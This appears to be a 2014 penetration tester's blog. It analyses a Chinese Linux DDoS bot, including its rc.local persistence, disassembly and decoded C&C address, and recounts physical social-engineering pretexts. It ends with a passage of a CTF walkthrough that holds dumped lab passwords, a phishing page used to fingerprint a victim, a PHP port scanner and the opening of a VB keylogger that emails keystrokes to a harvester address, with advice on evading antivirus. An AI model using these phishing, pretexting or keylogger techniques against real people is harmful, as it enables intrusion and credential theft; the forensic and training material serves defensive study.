what i do?

Am an Information Risk Consultant and Penetration Tester, i specialize mostly in penetrating secure networks/computer systems where i simulate an organized professional attack against your organization, where after that a detailed report with weakness and exploited vectors are summarized. This will help you gain control over your infrastructures security and maximize your protection.

Saturday, November 22, 2014

NEW WAVE OF ATTACKS, (this post is dedicated to Sys Admins)

I work a lot with huge Banks, several Government agencies, Parastatals, Huge PR firms that are always targets, by Major Blackhat organizations. Mark my words, i have seen all kinds of attacks, and dirt these hackers leave behind.



Since shellshock vulnerability went public i have seen some major bash attacks out of nowhere with hackers launching serious operations in major infrastructures across the globe. Chinese bot herders are also soooo busy getting ELF Binaries on servers especially the ones with Cpanels (commonly used by all Webmasters in Nairobi) due to CGIs that the webmasters left hanging behind. Funny thing is that Sys Admins don't listen, now a lot of them have learned these lessons the hard way.

Now apart from the Chinese Bot herders, Hacktivists and Organized Criminals, there is a wave of operatives literally targeting infrastructure that might have Sensitive Codes, Sensitive Documents, Website Backups + Their Web Databases, Email Addresses and then uploading to compromised servers or even 0wn3d CNCs and after using Shellshock vulnerabilities (CVE-2014-6271, CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187)

The way these attacks are running, it seems like some spy organizations, well funded, well organized, has a lot of time in their hands are ready to collect intelligence from unsuspecting infrastructures.

Its real important that Admins get to patch up their machines, in time. Such a huge flaw that affects every application that executes bash from Postfix to Apache to Nginx is Critical and can cause huge Business Impact.

Sunday, October 26, 2014

CHINA ELFs

Its been a while since i posted, been crazy busy, but this coming month, i will set up some time, for just blogging.

A few months ago, we were testing an KE Govt office, that was complaining of high attacks which they didn't understand and they couldn't find it, since it was Linux based. And as you know GOK has less capacity as far as Cyber Crime and Cyber Warfare is concerned. So during our tests, we landed on Linux.DDoS.22.

During Penetration Tests, we get to find a lot, and i can assure you, not only CyberWarfare in EAfrica, there alot of Cyber Espionage attacks and Cyber Terror happening right now.

Linux.DDoS.22 is Chinese ELF, that is used for DDOS attacks on unaware infrastuctures around the world. The attackers install the ELF as pktmake which you will find in /bin in your Linux servers and it modifies your /etc/rc.local for automatic restarts like below:

cat /etc/rc.local
#!/bin/sh -e
/root/task1 reboot
/root/server reboot
/root/guchun26 reboot


It will even stop the iptables as follows on rc.local:

cd  /root/
./10&
/etc/init.d/iptables stop
cd  /root/
./10&
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./10
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./10
/etc/init.d/iptables stop
cd  /root/
./ma&
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
/bin/cmds start



During our reverse engineering and forensics outputs we realized the elf was collecting information about the infected box, hardware, processor information, amount of memory, and is sent to some Chinese crooks via encrypted communication to a C&C.

The C&C is usually hard-coded on the source code, but the Chinese use mathematics formulas to hide the information and its up to the forensics engineers to find that information via Reversing Engineering, Counter Cyber Intelligence and Covert Data Acquisitions.

One of the IPs can be found with common checks by use of lsof as below

pktmake    1355    root    3u  IPv4   9964      0t0  TCP REDACTED.xx.ke:36811->23.234.50.32:37368 (ESTABLISHED)

With reverse engineering we were able to find other IPs from china that were used to upload logs and update the box, but the above machine if hacked, could find more intel about the main C&C and thats what we were after.

An nmap scan on the box showed us this:

Nmap scan report for 23.234.50.32
Host is up (0.32s latency).
Not shown: 65305 closed ports, 44 filtered ports
PORT      STATE SERVICE       VERSION
80/tcp    open  http-proxy    Squid http proxy 2.7.STABLE4
89/tcp    open  http          Microsoft IIS httpd
1025/tcp  open  msrpc         Microsoft Windows RPC
3306/tcp  open  mysql         MySQL (unauthorized)
5918/tcp  open  ms-wbt-server Microsoft Terminal Service
37368/tcp open  unknown


So, i am not going to go deep into how this Chinese Box was exploited, but after a couple of Reverse engineering the ELFs:

/bin/pktmake: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped

We found other ELFs that had great associations with the major ELF.

file /bin/cmds
/bin/cmds: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.18, not stripped

file /root/guchun26
/root/guchun26: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped



And these were the files used to compile:


crtstuff.c
main.cpp
DNS.cpp
AttackLogic.cpp
Iattack.cpp
info.cpp
Lock.cpp
SYN.cpp
TaskManager.cpp
TCP.cpp
TcpClient.cpp
Thread.cpp
UDP.cpp
utils.cpp
CC.cpp
rc4.c

The first initial part was to find pieces of code on how the elf was connecting to the C&C and how we would find all the other Boxes they were using for initial attacks.

_v2072 = ">>>>>>>>>>> in net wrok thread";
     *__esp = 135652608;
    _t31 = __ebx->basic_ostream& , 5, char * )(__edi, __esi);
    _v2072 = 134746416;
     *__esp = _t31;
    L0807EF10();
    L080DEAD0(__ebx, __edi, __esi,  &_v2052, 0, 2048);
    while(( *(_a4 + 100) & 255 ^ 1) != 0) {
        _t39 = _a4 + 560->c_str(void )();
        _v2068 = 37368;
        _v2072 = _t39;
         *__esp = _a4 + 60;
        if((_t39->Connect(char * , unsigned int )() ^ 1) == 0) {
            if((L08049C60(_a4, _a4) ^ 1) == 0) {
                while(( *(_a4 + 100) & 255 ^ 1) != 0) {
                    L080DEAD0(__ebx, __edi, __esi,  &_v2052, 0, 2048);
                    if((L0805223E( ?_? ( &_v2052), _a4 + 60,  &_v2052) ^ 1) != 0) {


Thats when we started to understand the mathematics formula used by the intruder.
Alright, some Segment mapping:

  Segment Sections...
   00     .note.ABI-tag .init .text __libc_freeres_fn __libc_thread_freeres_fn .fini .rodata __libc_subfreeres __libc_atexit __libc_thread_subfreeres .eh_frame .gcc_except_table
   01     .tdata .ctors .dtors .jcr .data.rel.ro .got .got.plt .data .bss __libc_freeres_ptrs
   02     .note.ABI-tag
   03     .tdata .tbss

A lot of Chinese Lang on the source code

.rodata:081301A0 aINZD  db 'エエスィヤュハシフラスモラヨハァーワ(%d)',0Dh,0Ah,0
0x00747E0  CUNG5
0x007518F  CUNG
0x0075693  B4CUNG
0x0102520  i18n:1999
 
 
A file called fake.cfg had some juicy information,


0
YOUR-IP-HERE:AND-HERE
10000:60000
 
 
getsockname(3, {sa_family=AF_INET, sin_port=htons(48417), sin_addr=inet_addr("mmd.mmd.mmd.mmd")}, [16]) = 0

Also they were doing test connections by use of www.baidu.com, to see if its reachable once the ELF is installed.

0x00E50FD  www.baidu.com
// PoC:
sendto(3, "\231\v\1\0\0\1\0\0\0\0\0\0\3www\5baidu\3com\0\0\1\0\1", 31, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("8.8.8.8")}, 16) = 31
recvfrom(3, "\231\v\201\200\0\1\0\2\0\0\0\0\3www\5baidu\3com\0\0\1\0\1\300"..., 1024, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("8.8.8.8")}, [16]) = 74


DDOS functionality was actually on a file called ThreadAttack.cpp, this was interesting, cause this is where we realized we might catch the main Chinese C&C server.
0x805478A ; CThreadAttack::EmptyConnectionAtk(CSubTask &)
  0x805478Apublic _ZN13CThreadAttack18EmptyConnectionAtkER8CSubTask
  0x805478A_ZN13CThreadAttack18EmptyConnectionAtkER8CSubTask proc near
  0x805478A push ebp
  0x805478B mov  ebp, esp
  0x805478D leave
  0x805478E retn
  0x805478E
  0x805478E _ZN13CThreadAttack18EmptyConnectionAtkER8CSubTask endp
 
  0x8054790 ; CThreadAttack::HttpAtk(CSubTask &)
  0x8054790public _ZN13CThreadAttack7HttpAtkER8CSubTask
  0x8054790_ZN13CThreadAttack7HttpAtkER8CSubTask proc near
  0x8054790 push ebp
  0x8054791 mov  ebp, esp
  0x8054793 leave
  0x8054794 retn
  0x8054794
  0x8054794 _ZN13CThreadAttack7HttpAtkER8CSubTask endp
 
  0x8054796 ; CThreadAttack::FakeUserAtk(CSubTask &)
  0x8054796public _ZN13CThreadAttack11FakeUserAtkER8CSubTask
  0x8054796_ZN13CThreadAttack11FakeUserAtkER8CSubTask proc near
  0x8054796 push ebp
  0x8054797 mov  ebp, esp
  0x8054799 leave
  0x805479A retn
  0x805479A
  0x805479A _ZN13CThreadAttack11FakeUserAtkER8CSubTask endp
  0x80532D2 sub  esp, 214h ; Integer Subtraction
  0x80532D8 lea  ecx, [ebp+var_10C] ; Load Effective Address
  0x80532DE mov  edx, offset _ZZN9CServerIP10InitializeEvE4C_48 ; CServerIP::Initialize(void)::C.48 <======
  0x80532E3 mov  eax, 100h
  0x80532E8 sub  esp, 4  ; Integer Subtraction
  0x80532EB push eax
  0x80532EC push edx
  0x80532ED push ecx
  0x80532EE call memcpy  ; Call Procedure
  0x80532F3 add  esp, 10h; Add
  0x80532F6 lea  ecx, [ebp+var_20C] ; Load Effective Address
  0x80532FC mov  edx, offset _ZZN9CServerIP10InitializeEvE4C_49 ; CServerIP::Initialize(void)::C.49 <======
  0x8053301 mov  eax, 100h
  0x8053306 sub  esp, 4  ; Integer Subtraction
  0x8053309 push eax
  0x805330A push edx
  0x805330B push ecx
  0x805330C call memcpy  ; Call Procedure
  0x8053311 add  esp, 10h; Add
  0x8053314 push 27h
  0x8053316 push offset a7005601212 ; "70/056/012/12"  ; <============================
  0x805331B push 0FFh
  0x8053320 lea  eax, [ebp+var_10C] ; Load Effective Address
  0x8053326 push eax
  0x8053327 call _ZN8CUtility7DeCryptEPciPKci ; CUtility::DeCrypt(char *,int,char  const*,int)
  0x805332C add  esp, 10h; Add
  0x805332F push 0Ah
  0x8053331 push offset a63551; "63551" ; <============================
  0x8053336 push 0FFh
  0x805333B lea  eax, [ebp+var_20C] ; Load Effective Address
  0x8053341 push eax
  0x8053342 call _ZN8CUtility7DeCryptEPciPKci ; CUtility::DeCrypt(char *,int,char  const

So far we had the formula, now it was all about getting down to crack the code on C&C information.
0x8062EF0
  0x8062EF0 ; CUtility::DeCrypt(char *, int, char  const*, int)
  0x8062EF0 public _ZN8CUtility7DeCryptEPciPKci
  0x8062EF0 _ZN8CUtility7DeCryptEPciPKci proc near  ; CODE XREF: CServerIP::Initialize(void)
  0x8062EF0 ; CServerIP::Initialize(void)
  0x8062EF0
  0x8062EF0 var_4= dword ptr -4
  0x8062EF0 arg_0= dword ptr  8
  0x8062EF0 arg_4= dword ptr  0Ch
  0x8062EF0 arg_8= dword ptr  10h
  0x8062EF0 arg_C= dword ptr  14h
  0x8062EF0
  0x8062EF0 push ebp
  0x8062EF1 mov  ebp, esp
  0x8062EF3 sub  esp, 10h; Integer Subtraction
  0x8062EF6 mov  [ebp+var_4], 0
  0x8062EFD jmp  short loc_8062F36 ; Jump
  0x8062EFD
  0x8062EFF
  0x8062EFF loc_8062EFF: ; CODE XREF: CUtility::DeCrypt(char *,int,char  const*,int)
  0x8062EFF mov  eax, [ebp+var_4]
  0x8062F02 and  eax, 1  ; Logical AND
  0x8062F05 test al, al  ; Logical Compare
  0x8062F07 jzshort loc_8062F1E ; Jump if Zero (ZF=1)
  0x8062F07
  0x8062F09 mov  eax, [ebp+var_4]
  0x8062F0C mov  edx, eax
  0x8062F0E add  edx, [ebp+arg_0] ; Add
  0x8062F11 mov  eax, [ebp+var_4]
  0x8062F14 add  eax, [ebp+arg_8] ; Add
  0x8062F17 mov  al, [eax]
  0x8062F19 inc  eax  ; Increment by 1
  0x8062F1A mov  [edx], al
  0x8062F1C jmp  short loc_8062F31 ; Jump
  0x8062F1C
  0x8062F1E
  0x8062F1E loc_8062F1E: ; CODE XREF: CUtility::DeCrypt(char *,int,char  const*,int)
  0x8062F1E mov  eax, [ebp+var_4]
  0x8062F21 mov  edx, eax
  0x8062F23 add  edx, [ebp+arg_0] ; Add
  0x8062F26 mov  eax, [ebp+var_4]
  0x8062F29 add  eax, [ebp+arg_8] ; Add
  0x8062F2C mov  al, [eax]
  0x8062F2E dec  eax  ; Decrement by 1
  0x8062F2F mov  [edx], al
  0x8062F2F
  0x8062F31
  0x8062F31 loc_8062F31: ; CODE XREF: CUtility::DeCrypt(char *,int,char  const*,int)
  0x8062F31 lea  eax, [ebp+var_4] ; Load Effective Address
  0x8062F34 inc  dword ptr [eax] ; Increment by 1
  0x8062F34
  0x8062F36
  0x8062F36 loc_8062F36: ; CODE XREF: CUtility::DeCrypt(char *,int,char  const*,int)
  0x8062F36 mov  eax, [ebp+var_4]
  0x8062F39 cmp  eax, [ebp+arg_C] ; Compare Two Operands
  0x8062F3C jge  short locret_8062F52 ; Jump if Greater or Equal (SF=OF)
  0x8062F3C
  0x8062F3E mov  eax, [ebp+var_4]
  0x8062F41 cmp  eax, [ebp+arg_4] ; Compare Two Operands
  0x8062F44 jge  short locret_8062F52 ; Jump if Greater or Equal (SF=OF)
  0x8062F44
  0x8062F46 mov  eax, [ebp+var_4]
  0x8062F49 add  eax, [ebp+arg_8] ; Add
  0x8062F4C mov  al, [eax]
  0x8062F4E test al, al  ; Logical Compare
  0x8062F50 jnz  short loc_8062EFF ; Jump if Not Zero (ZF=0)
  0x8062F50
  0x8062F52
  0x8062F52 locret_8062F52: ; CODE XREF: CUtility::DeCrypt(char *,int,char  const*,int)
  0x8062F52 ; CUtility::DeCrypt(char *,int,char  const*,int)
  0x8062F52 leave; High Level Procedure Exit
  0x8062F53 retn ; Return Near from Procedure
  0x8062F53
  0x8062F53 _ZN8CUtility7DeCryptEPciPKci endp
  0x8062F53

And this decoded the main C&C as 61.147.103.21:54460

This CnC Server also hosted the binaries to update the small operational botnets on HFS app.











One of the machines we caught, that was used to manipulate the L.A. Chinese Bot Server, was 220.191.230.250
Now do some research on that, and tell me if you know who those are.


Wednesday, July 02, 2014

MYTHS ON BIOMETRICS

Myth: Iris recognition devices use lasers to scan your eyes,

Reality: Iris recognition cameras take a black and white picture and use non-invasive near-infrared illumination that is barely visible and very safe.

Myth: "Stolen" body parts can be used to fool the system.

Reality: Quality biometric recording and detection systems can determine "liveness" in order to prevent tis type of fraud.

Myth: Identical twins can fool the system.

Reality: If the system is poorly configured, then this is possible, though can be eradicated during during a White Box Penetration Testing. Good systems will highlight a false match, which will require human intervention to complete the identification process.

Myth: Biometrics will get rid of the evil in our world.

Reality: Identity Management systems cannot perform miracles.


Continue doing real Penetration Testing, and lets secure facilities for real.

Wednesday, June 25, 2014

WHY DO PEOPLE STILL CODE IN BIRTHDAYS



Safes are hard to break, they say, but as long as the Safe is used by a human being and build by one, its not a Safe 100% anymore

Sometime during Pentests we get to go Face Off with these machines and with enough intel we know what is behind that door is vital to what we are after. A lot of testers don't think this way, but as experience grows in this field, you get to learn that this is necessary strategy in Real Life types of Pentest like Blackbox. Now getting to where the safe is, is always a problem, it may require you to go through a lot of hoops, e.g as a Janitor, well during this operation, i acted as Network Support.

IT People have inclusive access to executive office, have you ever seen how an office boss get soo happy when you fix a MS Windows problem that had bothered them for a while.
"Now i can watch new movies?"
"Yes ma'am"
"Even the new ones that i couldn't before"
"Yes, i can copy for you more if you want to"
"Go ahead, Go ahead Chuck"

So one thing i have come to find is the use of digits as key codes, and personnels love using numbers they can remember, even i have that vulnerability on such authentication, e.g SIM Pin numbers, MBanking etc. The easiest digits people remember all their life even when suffering from Old Timers are birthdays. And a lot of users will simply use these on a Safe, now the problem as Pentesters is not being in a position to do enough research on target employees online, e.g Social Media and Online Security Assessment.

Surveillance and Recovery Assessment is essential for such intrusions in a great way and this is done in teams. You might find that you get a lot of access to a facility just through this kind of assessment. Am currently doing a Pentest which is similar to this, and i started as a Janitor, its amazing that the employees wont ask who you are as long as you are serving them or cleaning their desks.

Employees and senior management need to understand that security starts with everyone, not the ICT Department thrown at corner cubicle and paid peanuts.

So most safes are used for storage of money but others store confidential documents. The personnel dealing with these documents need to have that sense of security, especially with their surroundings and who has access to their office. Sometimes these Safes might have information about the whole infrastructure and other company secrets that can seriously damage the organization.

When buying a safe, its important to understand the tough ones, and the value it will add to the company as far as Security is concerned.

So whenever you hire an Security Firm for a Blackbox Penetration and they are just doing perimeter scans, just know these are the consultants we call Script Kiddles and they are not in anyway helping you to secure your Infrastructure.



Friday, June 13, 2014

THE NEW AL-QAEDA TOOL, THAT SUPPORTS RSA FOR ASYMMETRIC ECRYPTION

This tool was once reported in 2013, but recently been discovered to be used by Alqaeda for comm all over the world.

Thursday, May 15, 2014

OLD SCHOOL PIZZA ATTACK STILL WORKS

We all know of old stories told years back in 2000-2003, where pentesters would walk into Data-Centers with Pizzas sandwiching laptops and they would get through and set up backdoors in an infrastructure. A lot of people love Pizza, it has the addictive addons, and this makes its a very good source of sport during Black Box Penetration testing, when on Surveillance And Recovery Assessments, Social Engineering Assessments, Red Team Assessments and several others to accomplish the BlackBox.



So we had this Blackbox Pentest last year, and i actually was afraid of this one coz i actually thought this will be hard to hack into, but anyway, i always know what challenges you makes u better and stronger.

After several go throughs', on Surveillance and Recovery we found out about one of the Directors, who seemed to be a silent investor and is based in Nairobi. We also found out about the WiFi used at the office, and an internal Data-Center that was a replica of what we were targeting in the cloud. So we needed to set up a plan and execute this attack professionally.

First step was to hack into the wireless network and second was to find a place to set up shop near their HQ office.

We started the Social Engineering Assessment due to the fact that the old school ways of Wireless Assessments weren't working, and we combine both assessments together, because breaking this WiFi Key would take 20 years or so and we didn't have such amount of time, this was a three months Penetration Testing. We had to target the Support office, they must have had the control to almost everything we wanted.

A few calls to the IT Team, pretending to be the Personal Assistant to the targeted director and all i had was to convince them that their Boss had bought them Pizza as a gift, for their hard work, and that he needed the number for all the members working that night and the next morning.

In the evening i hired a bike and bought about six pizzas at Pizza Inn, Westlands and was on the road for my delivery. I also made sure my phone was silent, no camera flash and blocked number just in case they had it.

On arrival, i kinda enjoyed a chat with them, then eventually asked for the Wireless Key to go online on FB. As the IT Guy was munching up on the delicious meal, he happily penned it for me on a paper. Yes the key was long, at the same time i had the chance to walk through the floors and captured as many frames as possible on camera. Next step was to set up a Safehouse near their offices and within a few weeks we had rooted most of their Servers, workstations and network devices.




Tuesday, April 29, 2014

HOW A FAKE PET HELPED US DURING THE FIRST INITIAL INFRITRATION OF AN INFRASTRUCTURE

 Security Starts with the People


There was this inquiry of Penetration Testing that was advertised early last year and a lot of organizations went for it. The owners of the organization wanted to know if they can be penetrated from the outside. So several Security Firms did their quotations, convinced the clients how they will do good test, and then they decided to go for one firm, and the pentest began. This firm had convinced the client, they will do a Blackbox in less than two weeks and it will be worthy their money.

Well wont go to the details, but what they got were mostly scans, and to sweeten the report, they added the website which was hosted overseas, as it was easy to break into.

So, i was contacted later in the year, by one of the Technical Managers, to do a small approach on how i would target them.

So on-line, only two IPs were available, the gateway to the office and the mail server OWA, all heavily protected. The gateway was NATed to and had a few machines, one with a httpd port, hosting a SAP kinda of Application. (Wont say much). The website was hosted overseas, on a shared host, well remember blackbox has no limitations.

So,  we decided to start with more online recon and also ground recon, especially since Surveillance and Recovery Assessments which is part of Blackbox, seems to yield more data for an attack.

Now this operation was not funded, it had to be cheap as possible, but with a promise of the whole Pentest, it was worth it. It was a two man operation.

So, we decided to start scouting the area, two and three tailgating that didn't work, we discovered a flaw later on. Sunday.... the guards drink a lot on Saturdays, and get to work Sundays, all way hangover-ed, they cant see anything, otherwise red-eyed and aren't attentive.

So, that Sunday we parked on the other side of the street, the organizations compounds is way off town, but fenced all way round with a stone wall. Parking lots were underground and one more was on top floor. One part of the compound where trucks got in to load and offload, had a normal fence, though electrified, all we needed was to gain access to at least one office and understand the Surveillance Cameras, Motion Detectors, Door-To-Door Security and Control Box Manufacturers + Version.

So we decided to pretend to have a lost a cat, and it had gone through the side fence to the Loading Center, selling that to the guard at the gate was going to be hard, since we were both men, and so i was to do the approach.

First thing i had to do, was to run around the block, and i had to pretend to come from the other side of the fence and also i needed to credibly sell the narrative, by the heavy breathing. The guard was a Luo, he was a bit hesitant until i said am visiting the country from Uganda. I didn't know Ugandans had such respect, but it worked. He was a bit high, recovering from his Saturday spoils, so he let me in and i started shouting the name of a fake cat and the HTC was busy photographing every part of the compound. Funny enough the server room was actually situated off the main building, just next to the car park lot, and it was open during the day and closed at nightfall as i gathered later. (Okay that was terrifying, i wished i was deploying APT)

I got access to the offices via the kitchen, the guards weren't even following me, he was just busy laid up in his cubicle the others nowhere to be seem. the doors had no control, no shredding of information, IT Offices had white-boards with a lot of details on the infrastructure. There was no paper shredders, managers offices were not closed, a few notepads with passwords which we came to understand later were stuck on the tables (Personnels still do this a lot, especially WIFI Keys), names and emails were gathered and the information gathered was just overwhelming.


At this age, Information Security Awareness is vital for Infrastructure and Cooperate Defense. What protects you, could be used to infiltrate your network.


Monday, March 31, 2014

HACKBATTLE 2013, BREAKING INTO JOAN WOKABIS LAPTOP



HACKBATTLE2013 TEAM OWNERZ INFO EXTRACT FROM DB AND EMAILS

Team 0wnErz extracting information from phpmyadmin and also from emails









HACKBATTLE 2013 FULL EMAIL RECON BY TEAM OWNERZ

 This is how Team OwnErz were able to initiate conversation with Joan and Daniella








HACKBATTLE 2013 EMAIL ACCESS FROM DATABASE SERVER

When you gain access to the DB server, the email configurations were stored there, mostly the Testers were supposed to get through the phpMyAdmin.


mysql> use emails;
Database changed
mysql> select * from both_emails;
+----------+----------+-----------+---------------------------+-----------------+
| PersonID | LastName | FirstName | email                     | password        |
+----------+----------+-----------+---------------------------+-----------------+
|        1 | wokabi   | joan      | joan.wokabi@gmail.com     | n@stys4l0nw3b   |
|        2 | daniella | wambuas   | daniell.wambuas@gmail.com | qwerty2014Nasty |
+----------+----------+-----------+---------------------------+-----------------+
2 rows in set (0.00 sec)

mysql>




TARGETTING AZANURU FOR MORE INFORMATION SOCIAL ENGINNERING, HACKBATTKE 2013

By Team 0wnErz, winners of Hackbattle 2013

Learning about the subnets and floating IPs

HACKBATTLE 2013 EMAIL SOCIAL ENGINEERING SNAPSHOTS



Targeting the users was the trick against the Lab

by TeamOwnErz

HACKBATTLE 2013 WALKTHROUGH BY THE WINNERS --TEAM OWN3RZ

HackBattle 2013 WalkThrough

Tutorial by Munir, Ruthie and Ibrahim


The Scenario

The Process

The Server looks well protected from the above scenario but it also shows evidence of workstations which are not behind the same firewall. This in the team 0wnErz case was the best target but how to get to them was the tricky bit.  

So the starting point was what we see i.e.
http://197.232.19.194

Looking at the site static html nothing fancy on it no php code therefore ruling out all possibility of SQL injections which is everyone’s juicy cake. Going for the forms, drat those mail too so no PHP form to post to .
The worst you get was directory listing and a failed adobe gallery scripts missing from the gallery page, damn those would have helped us read the logs as they need that access to work. So what now. Look at what the site has to offer.

Found 2 emails:

Joan.wokabi@gmail.com –Manager  (Home Page)
Daniella.wambuas@gmail.com – IT Staff Manager (About Us Page)

So basically for now we have 2 managers a business one and a techie one, so from here the push was for the business manager let’s see if she can help us.
So our First contact was to complain about the lack of user experience on the appointment page , nothing fancy just to see how she takes it and gauge our audience. This is how it went.

She replied and it’s apparent that she does care about user experience one thing noted though she copied daniella in the response who we found out is Daniel and the email was misspelled on the site.  So next a little bit of more getting to know about the where abouts but noticing there is a “database” where we have been recorded but where?? , nice!!!!!!.

A little bit more talk and she asks for more information about us and we gladly give our alias justifying our email too as to why it is not so personalized ;). On doing this and the rapport building up Joan mentions something important … she input us in the database and she has access to it, also from her email we can see that there’s an application to manage a database.


I don’t know about you but most people I know have :
phpMyAdmin
sqlbuddy

Let’s go with number one though , most common install directories for the system. Well long story short after a slow trial and error we found a /data directory. Cool I know right.  Progress Finally but now we need to tread carefully.
Now there are 2 things we can do:
try exploit the phpMyAdmin
try trap Joan and compromise Joan’s machine since she has access
We decided to try both but weigh our chances. So step one was view the phpMyAdmin

Also notice test.php well that’s phpinfo awesome wealth of information about the server:




Server root: /etc/apache2
webroot: /var/www/
User/Group www-data(33)/33
php version: 5.5.3-1ubuntu2.2
allow_url_fopen On
mysql: 5.5.35
internal IP: 192.168.200.2


Back to phpMyAdmin Well we are dealing with one revision from the latest version:

its 4.1.8.


What are the odds we will kill this thing and go free, well seeing the prompt tells you that no user goes in without a pass so we download the same version of phpmyAdmin and install it on our end now only one problem we create a valid login to a default db i.e. mysql however we can’t replay the 4 cookies, as we realized later is because the online one lacked mcrypt while we had it therefore our cookie pattern was quite different.

“God Blesses those who put errors on their homepage and this server wasn’t blessed it was cursed!!! ”

So lets go the Joan way first if she has access to this we shall know but we need to be smart about this so here is the breakdown of the needs.
Find Joan’s environment she must be one of the workstations , what’s she running , what’s her address etc.
Come up with a super trap and hook joan to it then get enough info to steal her credentials and login as her.

So for the first team 0wnErz went with make the competition so acquire a rogue domain first we we got (http://spa.oo3.co). We took a few days to just make a nice HTML site for a spa but added a bit of php code in two sections: the first took her information as she visited in the home page and wrote to a text file and incase she missed that we had another similar hook that mailed us the information when she submitted a form.
The information we needed most was :
IP
Full User Agent Information Including OS information to aid in performing our attack.

The Site:

The script on the homepage had this php added to it, it wrote to two files the first got a summary of just what we needed and the second everything incase there were extras:


So we talked to Joan to check it out ;)

and she did:


So she is on an XP and her IP is that as is on screen, Firefox 27 damn a lot of work here if we go for a browser attack but let’s check if the IP is for a router or Proxy or the actual machine. So we made a simple port scanner none noisy 
echo "####################################
\nTeam 0wnErz HB2013 PortScanner
\n ####################################

\n";
$host = "197.232.19.195";

$ports=array("21","22","23","25","53","80","110","143","139","389","443","587","1352","1433","3306","3389","5900","8080");
$arrlength=count($ports);

for($i=0;$i<$arrlength;$i++) {
$fp = fsockopen($host,$ports[$i],$errno,$errstr,10);
if($fp)
{
echo "port " . $ports[$i] . " open on " . $host ."
\n";
echo "
";
fclose($fp);
}
else
{
echo "port " . $ports[$i] . " closed on " . $host . "
\n";
echo "
";
}
flush();
}
?>

 
Anyway as you can see nothing fancy fsock is like telnet in PHP :D only we can do it from our webserver online or locally if it gets blacklisted easy to move to another server and continue but we didn’t,…. no noise :D

Rdesktop interesting is on this thing and http but rdesktop is important lets test it.

Windows Server 2003 WTF :D . 

Ok someone’s playing us so now part 2 of our attack needs to be smart we don’t have a very direct target.
 
Since we are dealing with an XP , user agent didn’t lie or rather we chose to believe that but either way we will need a windows payload , windows xp and server 2003 lack elevated desktop so binding some nice application to a keylogger should yield good results.  If you like commercially done keyloggers you can get things like redfox and ardamax etc limitless but nway save yourself the hustle and write some code signature based AV’s won’t have them most probably and keep it on simple logic not complex hooks those get flagged. 
Don’t get jealous ours does :
Screenshots and keys every ten minutes to our harvester email. And keys and apps keys have been trapped from we put our things together the simple way don’t download and run :D.

Note:
You need a harvester email preferably a Gmail one. Easiest to send to.
Here is a snippet from the logic of our keylogger in VB.

‘basic emailer include and simple system output
Imports System.IO
Imports System.Net.Mail
‘ yes if you are asking why the driver declares below its because we want to reduce dependencies and work with what windows already has.
